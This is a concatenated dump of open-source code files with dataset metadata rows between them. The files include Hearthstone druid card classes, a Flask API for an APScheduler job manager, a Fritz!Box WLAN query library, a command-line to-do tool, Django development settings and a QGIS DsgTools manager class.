def create_minion(self, p):
return Minion(4, 4, charge=True)
class BearDruid(MinionCard):
def __init__(self):
super().__init__("Druid of the Claw", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Claw (bear)")
def create_minion(self, p):
return Minion(4, 6, taunt=True)
class CatForm(ChoiceCard):
def __init__(self):
super().__init__("Cat Form", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class BearForm(ChoiceCard):
def __init__(self):
super().__init__("Bear Form", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class DruidOfTheClaw(MinionCard):
def __init__(self):
super().__init__("Druid of the Claw", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, choices=[
Choice(CatForm(), Transform(CatDruid()), SelfSelector()),
Choice(BearForm(), Transform(BearDruid()), SelfSelector())
])
def create_minion(self, player):
return Minion(4, 4)
class AncientSecrets(ChoiceCard):
def __init__(self):
super().__init__("Ancient Secrets", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class AncientTeachings(ChoiceCard):
def __init__(self):
super().__init__("Ancient Teachings", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class AncientOfLore(MinionCard):
def __init__(self):
super().__init__("Ancient of Lore", 7, CHARACTER_CLASS.DRUID, CARD_RARITY.EPIC, choices=[
Choice(AncientSecrets(), Heal(5), HeroSelector()),
Choice(AncientTeachings(), Draw(3), PlayerSelector())
])
def create_minion(self, player):
return Minion(5, 5)
class Health(ChoiceCard):
def __init__(self):
super().__init__("Rooted", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class Attack(ChoiceCard):
def __init__(self):
super().__init__("Uproot", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class AncientOfWar(MinionCard):
def __init__(self):
super().__init__("Ancient of War", 7, CHARACTER_CLASS.DRUID, CARD_RARITY.EPIC, choices=[
Choice(Health(), Give([Buff(ChangeHealth(5)), Buff(Taunt())]), SelfSelector()),
Choice(Attack(), Give([Buff(ChangeAttack(5))]), SelfSelector()),
])
def create_minion(self, player):
return Minion(5, 5)
class IronbarkProtector(MinionCard):
def __init__(self):
super().__init__("Ironbark Protector", 8, CHARACTER_CLASS.DRUID,
CARD_RARITY.COMMON)
def create_minion(self, player):
return Minion(8, 8, taunt=True)
class TauntTreant(MinionCard):
def __init__(self):
super().__init__("Treant", 1, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, ref_name="Treant (taunt)")
def create_minion(self, p):
return Minion(2, 2, taunt=True)
class Treant(MinionCard):
def __init__(self):
super().__init__("Treant", 1, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
def create_minion(self, _):
return Minion(2, 2)
class ChargeTreant(MinionCard):
def __init__(self):
super().__init__("Treant", 1, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, ref_name="Treant (charge)")
def create_minion(self, player):
return Minion(2, 2, charge=True, effects=[Effect(TurnEnded(), ActionTag(Kill(), SelfSelector()))])
class PoisonSeedsTreant(MinionCard):
def __init__(self):
super().__init__("Treant", 1, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False,
ref_name="Treant (poison seeds)")
def create_minion(self, player):
return Minion(2, 2)
class Panther(MinionCard):
def __init__(self):
super().__init__("Panther", 2, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST)
def create_minion(self, _):
return Minion(3, 2, MINION_TYPE.BEAST)
class IncreaseStats(ChoiceCard):
def __init__(self):
super().__init__("Give your other minions +2/+2 and taunt", 0,
CHARACTER_CLASS.DRUID, CARD_RARITY.LEGENDARY, False)
class SummonTreants(ChoiceCard):
def __init__(self):
super().__init__("Summon two 2/2 Treants with taunt", 0,
CHARACTER_CLASS.DRUID, CARD_RARITY.LEGENDARY, False)
class Cenarius(MinionCard):
def __init__(self):
super().__init__("Cenarius", 9, CHARACTER_CLASS.DRUID, CARD_RARITY.LEGENDARY, choices=[
Choice(IncreaseStats(), Give([Buff(ChangeAttack(2)),
Buff(ChangeHealth(2)),
Buff(Taunt())]), MinionSelector()),
Choice(SummonTreants(), Summon(TauntTreant(), 2), PlayerSelector())
])
def create_minion(self, player):
return Minion(5, 8)
class AttackMode(ChoiceCard):
def __init__(self):
super().__init__("Attack Mode", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class TankMode(ChoiceCard):
def __init__(self):
super().__init__("Tank Mode", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class AnodizedRoboCub(MinionCard):
def __init__(self):
super().__init__("Anodized Robo Cub", 2, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON,
minion_type=MINION_TYPE.MECH,
choices=[Choice(AttackMode(), Give([Buff(ChangeAttack(1))]), SelfSelector()),
Choice(TankMode(), Give([Buff(ChangeHealth(1))]), SelfSelector())])
def create_minion(self, player):
return Minion(2, 2, taunt=True)
class MechBearCat(MinionCard):
def __init__(self):
super().__init__("Mech-Bear-Cat", 6, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE, minion_type=MINION_TYPE.MECH)
def create_minion(self, player):
return Minion(7, 6, effects=[Effect(Damaged(),
ActionTag(AddCard(CardList(spare_part_list)), PlayerSelector()))])
class CobraForm(MinionCard):
def __init__(self):
super().__init__("Druid of the Fang", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Fang (cobra)")
def create_minion(self, player):
return Minion(7, 7)
class DruidOfTheFang(MinionCard):
def __init__(self):
super().__init__("Druid of the Fang", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON,
battlecry=Battlecry(Transform(CobraForm()), SelfSelector(),
GreaterThan(Count(MinionSelector(IsType(MINION_TYPE.BEAST))), value=0)))
def create_minion(self, player):
return Minion(4, 4)
class Malorne(MinionCard):
def __init__(self):
super().__init__("Malorne", 7, CHARACTER_CLASS.DRUID, CARD_RARITY.LEGENDARY, minion_type=MINION_TYPE.BEAST)
def create_minion(self, player):
return Minion(9, 7, deathrattle=[Deathrattle(AddCard(ObjectSource(SelfSelector()),
add_to_deck=True), PlayerSelector()),
Deathrattle(Remove(), SelfSelector())])
class GiftOfMana(ChoiceCard):
def __init__(self):
super().__init__("Gift of Mana", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE)
class GiftOfCards(ChoiceCard):
def __init__(self):
super().__init__("Gift of Cards", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE)
class GroveTender(MinionCard):
def __init__(self):
super().__init__("Grove Tender", 3, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE, choices=[
Choice(GiftOfMana(), GiveManaCrystal(), PlayerSelector(players=BothPlayer())),
Choice(GiftOfCards(), Draw(), PlayerSelector(players=BothPlayer()))
])
def create_minion(self, player):
return Minion(2, 4)
class FlameCat(MinionCard):
def __init__(self):
super().__init__("Druid of the Flame", 3, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Flame (cat)")
def create_minion(self, p):
return Minion(5, 2)
class FlameBird(MinionCard):
def __init__(self):
super().__init__("Druid of the Flame", 3, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Flame (bird)")
def create_minion(self, p):
return Minion(2, 5)
class FlameCatForm(ChoiceCard):
def __init__(self):
super().__init__("Flame Cat Form", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class FlameBirdForm(ChoiceCard):
def __init__(self):
super().__init__("Flame Bird Form", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class DruidOfTheFlame(MinionCard):
def __init__(self):
super().__init__("Druid of the Flame", 3, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, choices=[
Choice(FlameCatForm(), Transform(FlameCat()), SelfSelector()),
Choice(FlameBirdForm(), Transform(FlameBird()), SelfSelector())
])
def create_minion(self, player):
return Minion(2, 2)
class VolcanicLumberer(MinionCard):
def __init__(self):
super().__init__("Volcanic Lumberer", 9, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE,
buffs=[Buff(ManaChange(Count(DeadMinionSelector(players=BothPlayer())), -1))])
def create_minion(self, player):
return Minion(7, 8, taunt=True)
| mit | 5,221,729,277,601,726,000 | 34.521875 | 118 | 0.622064 | false |
honmaple/flask-apscheduler | sche/api.py | 1 | 6046 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# **************************************************************************
# Copyright © 2016 jianglin
# File Name: api.py
# Author: jianglin
# Email: [email protected]
# Created: 2016-11-11 16:05:44 (CST)
# Last Update: Sunday 2018-09-30 17:50:04 (CST)
# By:
# Description:
# **************************************************************************
from flask import request
from flask import Blueprint
from flask.views import MethodView
from apscheduler.jobstores.base import ConflictingIdError, JobLookupError
from sche import sche
from .utils import HTTP, Serializer
import json
class ScheView(MethodView):
def get(self):
ins = sche.status()
return HTTP.OK(data=ins)
def post(self):
"""start scheduler."""
if not sche.running:
sche.start(paused=True)
ins = sche.status()
return HTTP.OK(data=ins)
def delete(self):
"""shutdown scheduler."""
if sche.running:
sche.resume()
ins = sche.status()
return HTTP.OK(data=ins)
class ScheJobView(MethodView):
def get(self):
request_data = request.args.to_dict()
trigger = request_data.get('trigger')
jobs = sche.get_jobs()
ins = Serializer(jobs, trigger=trigger).data
return HTTP.OK(data=ins)
def post(self):
'''
        :param trigger: date or interval or crontab
        :param job: if job is None, the default func is http_request
'''
request_data = request.get_json()
trigger = request_data.get('trigger')
kwargs = request_data.get('kwargs')
if trigger == 'interval' and kwargs:
request_data['kwargs'] = json.loads(kwargs)
try:
job = sche.add_job(**request_data)
ins = Serializer(job).data
return HTTP.OK(data=ins)
except ConflictingIdError:
msg = 'Job ID %s is exists' % request_data.get('id')
return HTTP.BAD_REQUEST(message=msg)
except Exception as e:
msg = str(e)
return HTTP.SERVER_ERROR(message=msg)
def put(self):
request_data = request.get_json()
job_ids = request_data.pop('jobs', [])
success_ids = []
for pk in job_ids:
try:
sche.remove_job(pk)
msg = 'Job ID %s delete success' % pk
success_ids.append(pk)
except JobLookupError:
msg = 'Job ID %s not found' % pk
return HTTP.BAD_REQUEST(message=msg)
except Exception as e:
msg = str(e)
return HTTP.SERVER_ERROR(message=msg)
msg = '{} delete success!'.format(','.join(success_ids))
return HTTP.OK(data=success_ids, message=msg)
class ScheJobItemView(MethodView):
def get(self, pk):
job = sche.get_job(pk)
if not job:
msg = 'Job ID %s not found' % pk
return HTTP.BAD_REQUEST(message=msg)
ins = Serializer(job).data
return HTTP.OK(data=ins)
def put(self, pk):
request_data = request.get_json()
try:
sche.modify_job(pk, **request_data)
job = sche.get_job(pk)
ins = Serializer(job).data
return HTTP.OK(data=ins)
except JobLookupError:
msg = 'Job ID %s not found' % pk
return HTTP.BAD_REQUEST(message=msg)
except Exception as e:
msg = str(e)
return HTTP.SERVER_ERROR(message=msg)
def delete(self, pk):
try:
sche.remove_job(pk)
msg = 'Job ID %s delete success' % pk
return HTTP.OK(message=msg)
except JobLookupError:
msg = 'Job ID %s not found' % pk
return HTTP.BAD_REQUEST(message=msg)
except Exception as e:
msg = str(e)
return HTTP.SERVER_ERROR(message=msg)
class ScheJobPauseView(MethodView):
def post(self, pk):
"""Pauses a job."""
try:
sche.pause_job(pk)
job = sche.get_job(pk)
ins = Serializer(job).data
return HTTP.OK(data=ins)
except JobLookupError:
msg = 'Job ID %s not found' % pk
return HTTP.BAD_REQUEST(message=msg)
except Exception as e:
msg = str(e)
return HTTP.SERVER_ERROR(message=msg)
class ScheJobResumeView(MethodView):
def post(self, pk):
"""Resumes a job."""
try:
sche.resume_job(pk)
job = sche.get_job(pk)
ins = Serializer(job).data
return HTTP.OK(data=ins)
except JobLookupError:
msg = 'Job ID %s not found' % pk
return HTTP.BAD_REQUEST(message=msg)
except Exception as e:
msg = str(e)
return HTTP.SERVER_ERROR(message=msg)
class ScheJobExecuteView(MethodView):
def post(self, pk):
"""Executes a job."""
try:
sche.run_job(pk)
job = sche.get_job(pk)
ins = Serializer(job).data
return HTTP.OK(data=ins)
except JobLookupError:
msg = 'Job ID %s not found' % pk
return HTTP.BAD_REQUEST(message=msg)
except Exception as e:
msg = str(e)
return HTTP.SERVER_ERROR(message=msg)
def init_app(app, url_prefix='/api/scheduler'):
site = Blueprint('sche', __name__, url_prefix=url_prefix)
sche_endpoint = [
("/status", ScheView.as_view('status')),
("", ScheJobView.as_view('job')),
("/<pk>", ScheJobItemView.as_view('job_item')),
('/<pk>/pause', ScheJobPauseView.as_view('job_pause')),
('/<pk>/resume', ScheJobResumeView.as_view('job_resume')),
('/<pk>/execute', ScheJobExecuteView.as_view('job_execute')),
]
for url, endpoint in sche_endpoint:
site.add_url_rule(
url,
view_func=endpoint,
)
app.register_blueprint(site)
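# Illustrative wiring sketch (not part of the original module; the import path and
# application name are assumptions): create a Flask app and mount this API under the
# default /api/scheduler prefix.
#
#     from flask import Flask
#     from sche.api import init_app
#
#     app = Flask(__name__)
#     init_app(app)  # registers the 'sche' blueprint defined above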
| bsd-3-clause | 1,439,876,263,449,702,100 | 30.649215 | 76 | 0.540116 | false |
kbr/fritzconnection | fritzconnection/lib/fritzwlan.py | 1 | 4692 | """
Module to get informations about WLAN devices.
"""
# This module is part of the FritzConnection package.
# https://github.com/kbr/fritzconnection
# License: MIT (https://opensource.org/licenses/MIT)
# Author: Bernd Strebel, Klaus Bremer
import itertools
from ..core.exceptions import FritzServiceError
from .fritzbase import AbstractLibraryBase
# important: don't set an extension number here:
SERVICE = 'WLANConfiguration'
class FritzWLAN(AbstractLibraryBase):
"""
Class to list all known wlan devices. All parameters are optional.
If given, they have the following meaning: `fc` is an instance of
FritzConnection, `address` the ip of the Fritz!Box, `port` the port
to connect to, `user` the username, `password` the password,
`timeout` a timeout as floating point number in seconds, `use_tls` a
boolean indicating to use TLS (default False). The *service*
parameter specifies the configuration in use. Typically this is 1
for 2.4 GHz, 2 for 5 GHz and 3 for a guest network. This can vary
depending on the router model and change with future standards.
"""
def __init__(self, *args, service=1, **kwargs):
super().__init__(*args, **kwargs)
self.service = service
def _action(self, actionname, **kwargs):
service = f'{SERVICE}{self.service}'
return self.fc.call_action(service, actionname, **kwargs)
@property
def host_number(self):
"""
Number of registered wlan devices for the active
WLANConfiguration.
"""
result = self._action('GetTotalAssociations')
return result['NewTotalAssociations']
@property
def total_host_number(self):
"""
        Total number of registered wlan devices
for all WLANConfigurations.
"""
total = 0
_service = self.service
for service in itertools.count(1):
self.service = service
try:
total += self.host_number
except FritzServiceError:
break
self.service = _service
return total
@property
def ssid(self):
"""The WLAN SSID"""
result = self._action('GetSSID')
return result['NewSSID']
@ssid.setter
def ssid(self, value):
self._action('SetSSID', NewSSID=value)
@property
def channel(self):
"""The WLAN channel in use"""
return self.channel_infos()['NewChannel']
@property
def alternative_channels(self):
"""Alternative channels (as string)"""
return self.channel_infos()['NewPossibleChannels']
def channel_infos(self):
"""
Return a dictionary with the keys *NewChannel* and
*NewPossibleChannels* indicating the active channel and
alternative ones.
"""
return self._action('GetChannelInfo')
def set_channel(self, number):
"""
Set a new channel. *number* must be a valid channel number for
the active WLAN. (Valid numbers are listed by *alternative_channels*.)
"""
self._action('SetChannel', NewChannel=number)
def get_generic_host_entry(self, index):
"""
Return a dictionary with informations about the device
internally stored at the position 'index'.
"""
result = self._action(
'GetGenericAssociatedDeviceInfo',
NewAssociatedDeviceIndex=index
)
return result
def get_specific_host_entry(self, mac_address):
"""
Return a dictionary with informations about the device
with the given 'mac_address'.
"""
result = self._action(
'GetSpecificAssociatedDeviceInfo',
NewAssociatedDeviceMACAddress=mac_address
)
return result
def get_hosts_info(self):
"""
Returns a list of dictionaries with information about the known hosts.
The dict-keys are: 'service', 'index', 'status', 'mac', 'ip', 'signal', 'speed'
"""
informations = []
for index in itertools.count():
try:
host = self.get_generic_host_entry(index)
except IndexError:
break
informations.append({
'service': self.service,
'index': index,
'status': host['NewAssociatedDeviceAuthState'],
'mac': host['NewAssociatedDeviceMACAddress'],
'ip': host['NewAssociatedDeviceIPAddress'],
'signal': host['NewX_AVM-DE_SignalStrength'],
'speed': host['NewX_AVM-DE_Speed']
})
return informations
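# Illustrative usage sketch (not part of the original module; address and password are
# placeholder values): list the hosts known to WLANConfiguration 1 (typically 2.4 GHz).
#
#     fwlan = FritzWLAN(address='192.168.178.1', password='secret', service=1)
#     for host in fwlan.get_hosts_info():
#         print(host['mac'], host['ip'], host['signal'], host['speed'])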
| mit | -4,079,132,736,566,051,000 | 31.811189 | 87 | 0.610827 | false |
wangjun/dodo-1 | dodo.py | 1 | 12198 | #!/usr/bin/env python
import argparse
import calendar
import json
import re
import time
import os
import sys
from datetime import datetime
from time import mktime
DODO_FILE = os.path.join(os.getcwd(), 'DODO')
VERSION = "0.99"
class TerminalColors(object):
"""
Color class for listing out dodos
"""
HEADER = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def __init__(self):
pass
statuses = {
'+': 'add',
'*': 'accepted',
'-': 'rejected',
'#': 'working',
'.': 'complete'
}
def pretty_date(date_string):
timestamp = calendar.timegm((datetime.strptime(date_string, "%d-%m-%y %H:%M")).timetuple())
date = datetime.fromtimestamp(timestamp)
diff = datetime.now() - date
s = diff.seconds
if diff.days > 7 or diff.days < 0:
return date.strftime('%d %b %y')
elif diff.days == 1:
return '1 day ago'
elif diff.days > 1:
return '{} days ago'.format(diff.days)
elif s <= 1:
return 'just now'
elif s < 60:
return '{} seconds ago'.format(s)
elif s < 120:
return '1 minute ago'
elif s < 3600:
return '{} minutes ago'.format(s/60)
elif s < 7200:
return '1 hour ago'
else:
return '{} hours ago'.format(s/3600)
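# Behaviour sketch (timestamps are hypothetical): for a timestamp five minutes in the
# past pretty_date returns '5 minutes ago', for yesterday '1 day ago', and for anything
# older than a week the absolute '%d %b %y' form, e.g. '01 Jan 21'.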
def parse_dodo(line):
if line:
do_id = re.search("#\d+", line).group()[1:]
do_status = re.search(r'\[\[\W+\]\]', line).group()[2:-2]
do_time = re.search(r'(<<.+>>)', line)
do_description = re.search(r'({{.+}})', line)
if do_time:
do_time = do_time.group().replace("<<", "").replace(">>", "")
do_user = re.search(r'(\(\(.+\)\))', line)
if do_user:
do_user = do_user.group().replace("((", "").replace("))", "")
if do_description:
do_description = do_description.group().replace("{{", "").replace("}}", "")
return {
"id": do_id,
"time": do_time,
"user": do_user,
"status": do_status,
"description": do_description
}
def dodo_load(args):
global DODO_FILE
do_dict = {}
DODO_FILE = args.file or DODO_FILE
with open(DODO_FILE, 'r') as file_inst:
contents = file_inst.readlines()
for content in contents:
do_data = parse_dodo(content)
do_dict.update({do_data["id"]: do_data})
return do_dict
def dodo_unload(final_do_base):
content = ""
for key, value in sorted(iter(final_do_base.items()), key=lambda key_value: int(key_value[0])):
content += "#%s [[%s]] <<%s>> ((%s)) {{%s}}\n" % (value["id"], value["status"], value["time"],
value["user"], value["description"])
dodo_write(content, "w")
def dodo_init(args):
file_name = args.file or DODO_FILE
try:
try:
open(file_name, "r")
print("DoDo already exist.")
except IOError:
file_inst = open(file_name, "w")
file_inst.close()
print("Successfully initialized DoDo")
except IOError:
print("Cannot create file in the following location: %s" % file_name)
def dodo_write(content, mode="a"):
global DODO_FILE, do_base
file_inst = open(DODO_FILE, mode)
file_inst.write(content)
file_inst.close()
dodo_list()
def dodo_new_id ():
if len (do_base) == 0:
return "1"
else:
return str(max(int(id) for id in do_base.keys()) + 1)
def dodo_change_status(args, mod_do_base, status):
if not args.id:
print("ID (-id) can't be empty. May be try creating the task first")
return
do_entry = mod_do_base.get(args.id)
if do_entry:
do_entry["status"] = status
if args.desc:
do_entry["description"] = args.desc
if args.user:
do_entry["user"] = args.user
if args.time:
do_entry["time"] = args.time
else:
if not args.desc:
print("Description (-d) can't be empty")
return
do_id = dodo_new_id ()
do_description = args.desc
do_user = args.user
do_time = args.time or time.strftime("%d-%m-%y %H:%M", time.gmtime())
mod_do_base[do_id] = {
"id": do_id,
"time": do_time,
"user": do_user,
"status": status,
"description": do_description
}
dodo_unload(mod_do_base)
return
def dodo_add(args):
"""
+ add/proposed
* accepted
- rejected
# working
. complete
"""
do_user = args.user
if args.operation in ["add", "propose", "c"]:
if args.id:
print("Error: DoDo assigns id for you.")
exit()
do_id = dodo_new_id ()
do_description = args.desc
do_time = args.time or time.strftime("%d-%m-%y %H:%M", time.gmtime())
do_base[do_id] = {
"id": do_id,
"time": do_time,
"user": do_user,
"status": "+",
"description": do_description
}
dodo_unload(do_base)
elif args.operation == "accept":
dodo_change_status(args, do_base, "*")
elif args.operation == "reject":
dodo_change_status(args, do_base, "-")
elif args.operation == "workon":
dodo_change_status(args, do_base, "#")
elif args.operation == "finish":
dodo_change_status(args, do_base, ".")
elif args.operation in ["remove" or "d"]:
try:
do_base.pop(args.id)
except KeyError:
print("No task with id %s" % args.id)
dodo_unload(do_base)
elif args.operation == "flush":
for do_entry in list(do_base.values()):
if do_entry["status"] in ["-", "."]:
do_base.pop(do_entry["id"])
dodo_unload(do_base)
return
def dodo_list():
global do_base
print("%s%sID\tStatus\t\tDate(-t)\tOwner(-u)\t\tDescription (-d)\n%s" % (TerminalColors.BOLD,
TerminalColors.UNDERLINE,
TerminalColors.END))
for key, value in sorted(iter(do_base.items()), key=lambda key_value1: int(key_value1[0])):
color = TerminalColors.YELLOW
if value["status"] == ".":
color = TerminalColors.GREEN
elif value["status"] in ["-", 'x']:
color = TerminalColors.RED
elif value["status"] == "#":
color = TerminalColors.UNDERLINE + TerminalColors.YELLOW
elif value["status"] == "+":
color = TerminalColors.BLUE
user = value["user"] if value["user"] != "None" else "anonymous"
human_time = pretty_date(value["time"])
print("%s%s\t[%s]\t\t%s\t(%s)\t\t%s%s" % (color, value["id"], value["status"], human_time,
user, value["description"], TerminalColors.END))
print("\n%sAvailable Operations: c accept propose reject workon finish remove d flush\n" \
"Available Options: -id -d(description) -u(user) -t(time) -f(file)\n" \
"Status: + proposed - rejected * accepted # working . complete%s" % (
TerminalColors.BOLD, TerminalColors.END))
def dodo_import(args):
"""
Sample import JSON format (same as taskwarrior export format)
{"id":1,"description":"Read Docs Now","entry":"20150405T020324Z","status":"pending",
"uuid":"1ac1893d-db66-40d7-bf67-77ca7c51a3fc","urgency":"0"}
"""
do_user = args.user
json_file = args.input
json_source = json.loads(open(json_file).read())
for task in json_source:
do_id = dodo_new_id ()
do_description = task["description"]
utc_time = time.strptime(task["entry"], "%Y%m%dT%H%M%S%fZ")
do_time = time.strftime("%d-%m-%y %H:%M", utc_time)
do_status = "+"
if task["status"] == "pending":
do_status = "+"
if task["status"] == "completed":
do_status = "."
do_base[do_id] = {
"id": do_id,
"time": do_time,
"user": do_user,
"status": do_status,
"description": do_description
}
dodo_unload(do_base)
print("Imported %d tasks successfully" % len(json_source))
def dodo_export(args):
"""
{"id":1,"description":"Read Docs Now","entry":"20150405T020324Z","status":"pending",
"uuid":"1ac1893d-db66-40d7-bf67-77ca7c51a3fc","urgency":"0"}
Time is in UTC
"""
dodo_data = []
for instance in sorted(list(do_base.values()), key=lambda value: int(value["id"])):
dodo_data.append({
"id": instance["id"],
"time": instance["time"],
"user": instance["user"],
"status": statuses[instance["status"]],
"description": instance["description"]
}
)
if args.output:
try:
file_name = args.output
file_inst = open(file_name, "w")
file_inst.write(json.dumps(dodo_data))
file_inst.close()
print("%sExported DODO to %s%s" % \
(TerminalColors.GREEN, file_name, TerminalColors.END))
except IOError:
print("%sExport failed; Check for permission to create/edit %s%s" % \
(TerminalColors.RED, args.output, TerminalColors.END))
else:
print("%sUse -e or --export to <filename.json> to export to a file.%s" % \
(TerminalColors.YELLOW, TerminalColors.END))
print("%s" % TerminalColors.GREEN)
print(dodo_data)
print("%s" % TerminalColors.END)
def dodo_switch(args):
global do_base
if args.operation == "init":
dodo_init(args)
elif args.operation in ['add', 'propose', 'accept', 'reject', 'workon', 'finish', 'flush', 'remove', "c", "d"]:
dodo_add(args)
elif args.operation == 'import':
dodo_import(args)
elif args.operation == 'export':
dodo_export(args)
else:
dodo_list()
if __name__ == "__main__":
default_operation = 'list'
default_user = os.path.split(os.path.expanduser('~'))[-1]
parser = argparse.ArgumentParser()
parser.add_argument("operation", nargs='?', default=default_operation,
choices=[
'accept',
'add',
'finish',
'flush',
'list',
'propose',
'reject',
'remove',
'workon'
],
help="The operation to perform")
parser.add_argument("quick_access", nargs='?', default='',
help="Task ID for a operation or Description for the new task")
parser.add_argument("-d", "--desc", "--description",
help="Task Description")
parser.add_argument("-u", "--user", default=default_user, help="User ID")
parser.add_argument("-t", "--time",
help="Expected/Completed Date - 11-03-2015")
parser.add_argument("--id", help="List all existing dodos")
parser.add_argument("-f", "--file", help="DODO filename")
parser.add_argument("-i", "--input", help="Import from JSON file")
parser.add_argument("-o", "--output", help="Export to JSON file")
arguments = parser.parse_args()
if (arguments.operation == default_operation
and not os.path.isfile(arguments.file or DODO_FILE)):
parser.print_help()
sys.exit(0)
quick_access = arguments.quick_access
if quick_access:
if arguments.quick_access.isdigit():
arguments.id = quick_access
elif quick_access:
arguments.desc = quick_access
global do_base
do_base = {}
if arguments.operation == "init":
dodo_init(arguments)
else:
do_base = dodo_load(arguments)
dodo_switch(arguments)
| bsd-3-clause | 7,399,795,372,359,604,000 | 32.237057 | 115 | 0.523364 | false |
slapec/yaat | dev/yaat/settings.py | 1 | 2472 | #
#
# Most stuff has been disabled.
# See: INSTALLED_APPS, MIDDLEWARE_CLASSES, DATABASES
#
#
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
STATIC_URL = '/yatable/'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '+eyduytyp4o(p+ve6-ko==gfnz^m0&k&wymjjt#hev074p43m6'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
# 'django.contrib.admin',
# 'django.contrib.auth',
'django.contrib.contenttypes',
# 'django.contrib.sessions',
# 'django.contrib.messages',
'django.contrib.staticfiles',
'yatable'
)
MIDDLEWARE_CLASSES = (
# 'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
# 'django.contrib.auth.middleware.AuthenticationMiddleware',
# 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
# 'django.contrib.messages.middleware.MessageMiddleware',
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
# 'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'yaat.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
# 'django.contrib.auth.context_processors.auth',
# 'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'yaat.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
| mit | 893,957,678,182,100,600 | 24.484536 | 72 | 0.673139 | false |
lcoandrade/DsgTools | core/ServerManagementTools/earthCoverageManager.py | 1 | 3653 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
DsgTools
A QGIS plugin
Brazilian Army Cartographic Production Tools
-------------------
begin : 2017-02-24
git sha : $Format:%H$
copyright : (C) 2017 by Philipe Borba - Cartographic Engineer @ Brazilian Army
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
#General imports
from osgeo import ogr
from uuid import uuid4
import codecs, os, json, binascii
#DSG Tools imports
from DsgTools.core.Factories.DbFactory.dbFactory import DbFactory
from DsgTools.core.ServerManagementTools.genericDbManager import GenericDbManager
from DsgTools.core.Utils.utils import Utils
#qgis.PyQt imports
from qgis.PyQt.Qt import QObject
class EarthCoverageManager(GenericDbManager):
"""
This class manages the customizations on dsgtools databases.
"""
def __init__(self, serverAbstractDb, dbDict, edgvVersion, parentWidget = None):
super(self.__class__,self).__init__(serverAbstractDb, dbDict, edgvVersion, parentWidget = None)
def materializeIntoDatabase(self, abstractDb, propertyDict):
"""
Method that is reimplemented in each child when installing a property involves changing any sort of database structure
"""
jsonDict = self.utils.instantiateJsonDict(propertyDict['jsondict'])
abstractDb.createCentroidAuxStruct(list(jsonDict['earthCoverageDict'].keys()), useTransaction = False)
def updateMaterializationFromDatabase(self, abstractDb, propertyDict, oldPropertyDict):
"""
Method that is reimplemented in each child when updating a property involves changing any sort of database structure
"""
newJsonDict = self.utils.instantiateJsonDict(propertyDict['jsondict'])
oldJsonDict = self.utils.instantiateJsonDict(oldPropertyDict['jsondict'])
abstractDb.updateEarthCoverageDict(newJsonDict, oldJsonDict, useTransaction = True)
